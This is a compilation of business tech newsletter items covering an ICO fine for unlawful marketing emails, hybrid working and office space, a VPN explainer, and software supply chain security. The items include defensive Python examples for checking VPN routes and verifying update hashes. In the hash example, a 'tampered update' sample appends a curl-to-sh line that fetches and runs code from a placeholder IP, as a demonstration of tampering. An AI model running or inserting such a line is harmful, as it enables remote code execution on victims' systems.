Tech News : Conservative Party Gets £10,000 Data Protection Fine

The ICO has fined the Conservative Party £10,000 for sending unlawful marketing emails to people who did not want to receive them.

Breach

Following an investigation into emails sent by the Conservative Party, in the name of Rt Hon Boris Johnson MP, during the eight days in July 2019 after he became Prime Minister, the ICO concluded that the party had breached the Privacy and Electronic Communications Regulations 2003 (PECR).

Unsolicited Emails

The breach of PECR occurred because, as the ICO concluded, the Conservative Party did not have the necessary valid consent in cases where marketing emails were received by complainants. Although 51 emails were found to be conclusively in breach of the regulations, the Conservative Party sent out 1,190,280 marketing emails between 24 July and 31 July 2019, and the ICO accepts it is likely that some of those emails would have been validly sent, but that it is not possible to identify what that proportion is. This is because, as stated by the ICO, “the Conservative Party failed to retain clear records of the basis upon which people had consented to receive marketing emails, as required by law.”

More Marketing Emails Sent During The Investigation

The ICO expressed concern that while the investigation into the initial breach was underway before the Conservative Party had addressed the original compliance issues, it “engaged in an industrial-scale marketing email exercise during the December 2019 General Election campaign, sending nearly 23 million emails” which “generated a further 95 complaints”.

Stephen Eckersley, ICO Director of Investigations, said “It’s really concerning that such large-scale processing occurred during the ICO’s ongoing investigation and before the Conservative Party had taken all the steps necessary to ensure that its processing, and database of people who would receive emails, was fully compliant with the data protection and electronic marketing regulations”.

The Fine

There has been criticism from some online commentators that the £10,000 fine may not be enough, when considering that according to newspaper reports, one luxury hamper of organic food delivered to 10 Downing Street recently cost £27,000.

What Does This Mean For Your Business?

It is disappointing and concerning that such a large political party (the party now in government) either did not check, did not know about, or failed to comply with well-publicised data protection laws. For those at the heart of UK law-making, this does not reflect well.

For businesses, this story is a reminder that there are clear laws pertaining to direct marketing (i.e. any communication of advertising or marketing material directed at particular individuals). It is a reminder that consent is vital, and it is important to keep clear records of the basis upon which people consent.  Ignoring the regulations can result in a hefty fine and could prove very damaging to the reputation of a business.

Tech News : Hybrid Working Could See Half of UK Businesses Cut Office Space

A recent PricewaterhouseCoopers (PwC) survey has found that half of UK businesses expect to reduce the size of their office space, and one-third expect to reduce it by more than 30 percent.

Reduce Size of Real Estate Portfolio

The Occupier Survey of 258 of the UK’s largest companies found that half of the organisations surveyed expect to reduce the size of their real estate portfolio and one third believe they will reduce their office footprint by more than 30 percent, while only 10 percent agree that the level of employees working from the office will return to pre-pandemic levels.

Reduction of Nine Million Square Feet

The survey found that major UK employers could reduce their office portfolio by up to nine million square feet, which is equivalent to 14 Walkie Talkie buildings (the 37-floor high rise on London’s Fenchurch Street).

Hybrid Working

The survey concludes that the shift to hybrid working, whereby employees work part of their time at home and part in the office, is now a pattern that is (after the pandemic) embedded in the working culture of many organisations and is the driver for the need to reduce office space. 

Increased Productivity?

Results from the Occupier Survey across all sectors showed that just over half of all respondents said that virtual working has had a positive impact on productivity in their organisation.

PwC Post-Pandemic

PwC, who conducted the survey, is one of the ‘big four’ accountancy firms and recently went public with its post-pandemic working arrangements for its employees.  PwC’s accountants and consultants in the UK will now be able to spend an average of just two to three days a week in the office.  This means that staff will typically be spending 40 to 60 percent of their time at its 20 UK offices or at client sites, while the rest of their working week can be spent working remotely. Also, PwC’s staff will now have greater flexibility to decide their working hours, can log on at times that suit them, and many employees will be given a half-day on Fridays in July and August (just for 2021 as an experiment).

Other businesses that have announced a change from the traditional 9 to 5 office working practices include the Nationwide building society (where many staff have the choice of office or remote working) and oil company BP whose staff can spend two days a week working from home.

Not Everyone Agrees

Not everyone is in favour of a post-pandemic hybrid, blended approach to work. For example, in February, the CEO of Goldman Sachs, David Solomon, publicly rejected the idea of flexible/hybrid working as an “aberration” because it doesn’t fit with an ‘apprenticeship culture’.

Also, Chancellor Rishi Sunak recently highlighted the benefits of workers actually spending physical time together in the office.

Impact on City Centres and Surrounding Businesses

Reducing office space in city-centres, however, could have a negative impact on many of the surrounding (and dependent) businesses such as sandwich shops, other retailers, cleaners, transport workers, bars, restaurants, and gyms.

What Does This Mean For Your Business?

This story is really about what post-pandemic working will look like for many big businesses with costly, often city-centre and/or prime-location office space that has traditionally relied upon everyone coming to work at the office. The pandemic forced many businesses to look again at their model for the working week and their costs, and the signs are that there will be a clear move to hybrid working and a blended approach. This means a reduction of office portfolios for many big businesses, and perhaps other ideas for office space such as flexible space, ‘subleasing’ models and partnerships for shared office space.

Tech Insight – What Is A VPN?

In this article, we take a brief look at what a VPN is, how it works, its advantages, plus its disadvantages.

What Is A VPN?

A Virtual Private Network (VPN) is a service that creates an encrypted ‘tunnel’ between your device and another network over the Internet. It is a private, secure way to send and receive data across shared or public networks as if your computing devices were directly connected to the private network.

How Does a VPN Work?

A consumer VPN works by sending all of your device’s internet traffic through an encrypted tunnel to the VPN provider’s server, which then forwards it on to its destination. Your internet service provider (ISP) still carries the traffic, but sees only encrypted data going to the VPN server, not the sites you visit. Because your traffic exits from the VPN provider’s server, the sites you connect to see that server’s IP address rather than your own, which masks your real IP address and location from them. Two caveats follow from this: the VPN provider itself can see your real IP address and your traffic, so the provider has to be trusted; and the protection ends at the provider’s server, so between that server and the destination your traffic is only as protected as the application protocol (e.g. HTTPS) makes it.

Why Use A VPN?

There are many reasons why people use VPNs including:

– A general wish to keep data secure, keep online activity private, and feel safer.

– Protection from the risks of using public Wi-Fi networks (e.g. while out and about).

– Maintaining security when working remotely/from home (as many have done during the pandemic).

– As a good way to protect all devices in one go (for example, most paid-for VPNs provide multiple simultaneous connections).

– To escape bandwidth throttling.

– For those living in countries with repressive regimes, a VPN can help users reach the outside world with less chance of the content of their traffic being inspected, although the use of a VPN itself may be detectable. Note that Russia has restricted VPN and proxy services since 2017 (providers must block access to sites on the state blacklist or risk being blocked themselves), and China regulates Virtual Private Networks through the country’s Ministry of Industry and Information Technology, requiring developers to obtain a government licence before offering a VPN.

Choosing a VPN

Things to consider when choosing a VPN service include:

– A service with a ‘no logging’ policy (it keeps no records of your activity) can provide greater privacy, but the claim is hard to verify from the outside, so prefer providers whose policy has been independently audited.

– Find out where the VPN operator is geographically based, and therefore which jurisdiction it answers to. A VPN company in some countries may be subject to control and interference by the state, such as being compelled to enable logging or add tracking. Many free VPN apps, for example, have been found to have Chinese ownership.

– Google the VPN service to see if there has been any history of incidents and problems with the service.

– Read reviews about different VPN services (bearing in mind that some may be unreliable, paid-for reviews).

– Make sure that the VPN service you choose has enough servers (‘exit nodes’) in the locations you want to appear to connect from, in order to get better speed and service.

– Check whether the service disallows certain protocols e.g., P2P traffic, thereby potentially negatively affecting the service levels at certain times.

Advantages

Some advantages of VPNs include:

– Getting around geo-locking of content.  For example, a VPN can make a user look like they are in a region where content is available, thereby giving the user access to their favourite content wherever they are.

– VPNs improve privacy by hiding details such as your IP address and location from the sites you visit. They do not make you anonymous, however: the VPN provider can still see who you are and what you connect to.

– VPNs are a good way to provide a secure connection for remote workers.

– Convenience. Having a VPN that can easily be switched on (e.g. while using a device in a public place such as a café) offers a very convenient mobile security and privacy solution.

– If shopping online, using a VPN can help save money by getting around different prices for services based on region.

– VPNs can represent a very cost-effective privacy measure when compared to the licensing costs of some security software. They complement rather than replace endpoint protection and firewalls, which address different threats.

Disadvantages

Some of the disadvantages of VPNs include:

– Because traffic takes an extra hop through the VPN server and must be encrypted and decrypted on the way, slower connection speeds and higher latency can sometimes result. VPN service providers are, however, working on ways to minimise this problem.

– VPN blockers can be used by companies looking to charge users based on their geographic location.

– Setting up some VPNs can be complicated, and poor configuration from poor setup could lead to information leaks.

– Dropped connections can be a problem with VPNs. If the tunnel drops and the device silently falls back to its normal connection, the user’s true IP address and traffic are exposed; this can also lead to problems with a user’s ISP if sites have been visited that violate the ISP’s terms of service. Many VPN clients offer a ‘kill switch’ that blocks all traffic while the tunnel is down, and it should be enabled.

– VPNs can add latency and reduce throughput for activities that need a lot of bandwidth (e.g. gaming); however, the VPN can easily be disabled and re-enabled as needed.
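The dropped-connection problem above is easy to check for on a Linux host. The following is an added example (not code from the original article or any VPN vendor): it parses the output of the Linux `ip route` command and reports whether all default traffic is routed through the tunnel interface. The two routing tables embedded below are constructed for the example; the tunnel interface name `tun0` and the `live_check` helper are assumptions.

```python
"""Check whether a Linux host's default traffic really leaves via the VPN tunnel."""
import subprocess


def parse_routes(ip_route_output: str) -> list[dict]:
    """Turn `ip route` lines into dicts of {dst, via, dev}; unused tokens are ignored."""
    routes = []
    for line in ip_route_output.strip().splitlines():
        fields = line.split()
        if not fields:
            continue
        route = {"dst": fields[0], "via": None, "dev": None}
        # Walk the "key value" pairs that follow the destination.
        for key, value in zip(fields[1:], fields[2:]):
            if key == "via":
                route["via"] = value
            elif key == "dev":
                route["dev"] = value
        routes.append(route)
    return routes


def tunnel_covers_default(ip_route_output: str, tunnel_iface: str = "tun0") -> bool:
    """True if everything not explicitly routed elsewhere leaves via the tunnel.

    Many clients (OpenVPN with `redirect-gateway def1`) do not replace the
    `default` route; they add 0.0.0.0/1 and 128.0.0.0/1 via the tunnel, which
    are more specific than `default` and therefore win. Other clients install
    a `default` route on the tunnel device. Both forms are accepted here.
    """
    routes = parse_routes(ip_route_output)
    via_tunnel = {r["dst"] for r in routes if r["dev"] == tunnel_iface}
    if "default" in via_tunnel:
        return True
    return {"0.0.0.0/1", "128.0.0.0/1"} <= via_tunnel


def live_check(tunnel_iface: str = "tun0") -> bool:
    """Run `ip route` on this machine (Linux only) and apply the check."""
    out = subprocess.run(["ip", "route"], capture_output=True, text=True, check=True).stdout
    return tunnel_covers_default(out, tunnel_iface)


# Constructed sample: tunnel up (OpenVPN-style half routes) and tunnel dropped.
# 203.0.113.10 plays the VPN server, reached directly via the physical interface.
ROUTES_TUNNEL_UP = """\
0.0.0.0/1 via 10.8.0.1 dev tun0
default via 192.168.1.1 dev wlan0 proto dhcp metric 600
10.8.0.0/24 dev tun0 proto kernel scope link src 10.8.0.6
128.0.0.0/1 via 10.8.0.1 dev tun0
192.168.1.0/24 dev wlan0 proto kernel scope link src 192.168.1.23
203.0.113.10 via 192.168.1.1 dev wlan0
"""

ROUTES_TUNNEL_DROPPED = """\
default via 192.168.1.1 dev wlan0 proto dhcp metric 600
192.168.1.0/24 dev wlan0 proto kernel scope link src 192.168.1.23
"""

if __name__ == "__main__":
    for label, table in (("tunnel up", ROUTES_TUNNEL_UP), ("tunnel dropped", ROUTES_TUNNEL_DROPPED)):
        print(f"{label}: traffic inside tunnel = {tunnel_covers_default(table)}")
```

Note that the check only reads the main routing table; clients that use policy routing (a separate table selected by a routing rule) need `ip route show table all` instead, and a routing check is no substitute for a firewall-based kill switch, which blocks traffic rather than merely reporting the problem.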

Popular VPNs

Popular VPN services promoted in the UK include ExpressVPN, NordVPN, Surfshark, IPVanish, CyberGhost, Hotspot Shield, ProtonVPN, and Private Internet Access.

What Does This Mean For Your Business?

A VPN is a convenient and effective security and privacy tool that has become particularly relevant for remote workers over the last year. Choosing a trusted, paid-for VPN solution with a good reputation is advisable for maximum peace of mind and VPNs offer benefits beyond just security (e.g. getting around geo-locking of content). It should always be remembered, however, that a VPN is one of many different tools and tactics that businesses can use as part of a much broader business and cyber security strategy.

Featured Article : How Secure Is Your Software/Digital Supply Chain?

It is easy to think that cyber-attacks are likely to come from outsiders unconnected to the business, but how much do you know about the security of your digital supply chain?

Software Supply Chain Risks

Businesses use many different third-party software tools as part of their day-to-day operations, and for organisations in the public sector the software, systems and networks used may be closely tied to main suppliers providing bespoke solutions. Software supply chains are part of an organisation’s wider information and communications technology (ICT) supply chain, which is itself a network of retailers, distributors and suppliers, each a link in the chain of production, sale and delivery of software, hardware and managed services, and each a point at which risk can enter.

As highlighted in a recent NIST (US) white paper, software is at risk of malicious or inadvertent introduction of vulnerabilities at each phase of the ICT supply chain lifecycle: design, development and production, distribution, acquisition and deployment, maintenance, and disposal. Over-privileged access (for example, accepting a third-party product’s default permissions without investigating further), additional access paths that third-party software opens into the network, and third-party software that requires frequent communication with the vendor to update itself can all represent real threats to business/organisational security.

As defences against the more common attack vectors have improved (those areas are now well defended by most organisations), cyber-criminals have turned their attention to more vulnerable areas with easier access: the software supply chain. This is a difficult area for businesses to monitor and defend, because much of it rests on trust in vendors, and the more third-party software a business uses (from different sources) and the more links there are in the chain, the more risk there is.

How?

An example of how a supply chain can be exploited is attackers inserting malicious code or a malicious component into a company’s trusted software (or hardware), or compromising the company’s build or update infrastructure, so that the legitimate updates the company sends out become trojan horses (malware). Because customers install those updates automatically and trust them, this can give the criminals control over the supplier’s customer networks, potentially affecting thousands of victims.

Survey

Some of the challenges that companies face in tackling the issue are highlighted in a BlueVoyant survey from 2020, in which 80 percent (four out of five) of Chief Information Officers and Chief Information Security Officers (CIOs and CISOs) said they had experienced a breach originating with a third-party vendor in the past year. The survey also revealed that almost one-third of security professionals (29%) had no way of knowing whether a cyber risk had emerged in a third-party vendor, fewer than a quarter (22.5%) actively monitored their entire supply chain, and almost one-third (32%) typically reassessed and reported a vendor’s cyber-security risk position only twice a year or less frequently.

Examples

High profile examples of supply chain attacks include:

– SolarWinds. In 2020, US-based IT management company SolarWinds Corp was infiltrated by a foreign threat actor who compromised the company’s build process and inserted malicious code into its Orion network monitoring software. SolarWinds then unwittingly distributed signed software updates containing that code to its customers. This was one of the biggest and most sophisticated supply chain attacks ever seen: up to 18,000 Orion customers are thought to have installed the trojanised update, although the attackers then singled out a much smaller number of high-value victims for follow-on intrusion.

– In 2017, there were suspicions in the US that Kaspersky antivirus was being used by a foreign intelligence service for spying. This led to US government agencies being required to remove Kaspersky’s products from their networks and being barred from acquiring that vendor’s products in future.

– Also in 2017, the NotPetya attack saw destructive data-encrypting malware (presented as ransomware, but with no working recovery) delivered through the update mechanism of a legitimate piece of accounting software used by most of Ukraine’s financial and government institutions. The malware then spread laterally across trusted internal networks rather than arriving over the internet, thereby bypassing the perimeter controls organisations had put in place to prevent ransomware attacks.

Reducing The Risk of Software Supply Chain Attacks

Although the situation is a challenging one for many businesses and organisations, there are measures that can be taken to reduce the risk of attacks, breaches and other security and network issues caused via the software supply chain.  These include:

– Implementing a formal risk management program to assess all third-party suppliers against a set of criteria relating to whether third parties really need to access an organisation’s data or systems, and how business-critical they are to organisational processes. This can help CISOs and CIOs to identify and prioritise suppliers who pose the highest risk and need the most scrutiny and controls.

– Putting a patching policy and regime in place so that software updates are applied as soon as possible, to prevent criminals from exploiting known vulnerabilities. This should also involve testing security-related updates in a controlled environment before rolling them out across the company network, and verifying that each update really comes from the expected source (for example, by checking the vendor’s signature or published hashes) before it is installed.

– Adopting a zero-trust approach and architecture, in which access is never granted simply on the basis of trust but is always verified and limited to what is needed, so that a compromised supplier component cannot quickly escalate into a network-wide problem.

– Using more holistic, forward-thinking and data-driven strategies (for example, continuous monitoring of vendors’ security posture rather than an annual questionnaire) can help businesses/organisations to be better informed about the security readiness of their vendor partners.

– Sticking to proven security strategies such as investing in security programs, conducting regular risk assessments, and prioritising issues highlighted by the assessments, devising a plan, hiring the right staff, and using trusted, evidence-based tools can all help to mitigate the risks.
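The trojanised-update scenario described under “How?” and the update-verification step in the list above both come down to one control: the installer refuses any artefact whose hash does not match a value pinned in advance. The following is an added example, not code from the original article or from any vendor: the artefact bytes, the manifest and the requirements file are all constructed inline, and the names `agent-1.4.2.sh` and `examplelib` are hypothetical. It assumes the manifest is obtained over a separate trusted channel (or is signed by the vendor), because a manifest fetched from the same compromised pipeline as the download would be rewritten along with it.

```python
"""Pin and verify software artefacts against an out-of-band hash manifest."""
import hashlib
import hmac


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def build_manifest(artefacts: dict[str, bytes]) -> dict[str, str]:
    """Record the hash of each known-good artefact (done once, at release time)."""
    return {name: sha256_hex(data) for name, data in artefacts.items()}


def verify_artefact(name: str, data: bytes, manifest: dict[str, str]) -> bool:
    """Return True only if `data` matches the hash pinned for `name`.

    Unknown artefacts are rejected rather than trusted, and the comparison is
    constant-time so the check itself does not leak which bytes differ.
    """
    expected = manifest.get(name)
    if expected is None:
        return False
    return hmac.compare_digest(sha256_hex(data), expected)


def check_requirements_pinned(requirements_text: str) -> list[str]:
    """Flag dependency lines lacking an exact version pin or a sha256 hash.

    Mirrors the discipline of pip's `--require-hashes` mode: every line must be
    `name==version --hash=sha256:<hex>` so that a substituted upstream package
    fails to install instead of silently replacing the one that was reviewed.
    """
    problems = []
    for raw in requirements_text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        if "==" not in line:
            problems.append(f"{line}: no exact version pin")
        if "--hash=sha256:" not in line:
            problems.append(f"{line.split()[0]}: no sha256 hash")
    return problems


# Constructed sample: a "release" script and a copy tampered with in transit.
GOOD_UPDATE = b"#!/bin/sh\necho 'agent 1.4.2 installing'\n"
TAMPERED_UPDATE = GOOD_UPDATE + b"curl -s http://203.0.113.5/x | sh\n"  # injected line
MANIFEST = build_manifest({"agent-1.4.2.sh": GOOD_UPDATE})

# Constructed sample requirements file; the hash value is a placeholder.
SAMPLE_REQUIREMENTS = (
    "examplelib==1.2.0 --hash=sha256:" + "ab" * 32 + "\n"
    "otherlib>=2.0   # floating version, no hash\n"
)

if __name__ == "__main__":
    print("good update accepted:", verify_artefact("agent-1.4.2.sh", GOOD_UPDATE, MANIFEST))
    print("tampered update accepted:", verify_artefact("agent-1.4.2.sh", TAMPERED_UPDATE, MANIFEST))
    print("unknown artefact accepted:", verify_artefact("agent-9.9.9.sh", GOOD_UPDATE, MANIFEST))
    for problem in check_requirements_pinned(SAMPLE_REQUIREMENTS):
        print("requirements problem:", problem)
```

Hash pinning stops an artefact being swapped between the vendor and you; it does not help when, as with SolarWinds, the vendor’s own build produced the malicious artefact and published its hash. That case needs controls on the vendor side (signed, reproducible builds and a locked-down build environment), which is why supplier assessment appears alongside technical verification in the list above.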

What Does This Mean For Your Business?

Previous high-profile attacks such as SolarWinds have highlighted the interconnected vulnerabilities of business software/digital supply chains. Businesses face the challenges of first getting an overall view of where the potential risks/threats could come from (an audit and regular risk assessments) and then implementing an approach (e.g. zero trust), tools and procedures that mitigate those risks in a cost-effective and operationally friendly way. Interference by criminals leading to successful supply chain attacks has been shown to occur at any point from the development of software, through distribution, right through to disposal. This means that all businesses and organisations, private and public sector, need to take a close interest in the security profile of their suppliers as well as of their own organisations.

Tech Tip – Re-Open A Recently Closed Tab

Sometimes you can accidentally close an important browser tab. Here’s a fast and easy way to re-open that tab:

– In Google Chrome or Microsoft Edge, right-click on the tab bar of the browser (the strip containing the tabs, above the address field).

– Select ‘Reopen closed tab’.

– Alternatively, press Ctrl + Shift + T.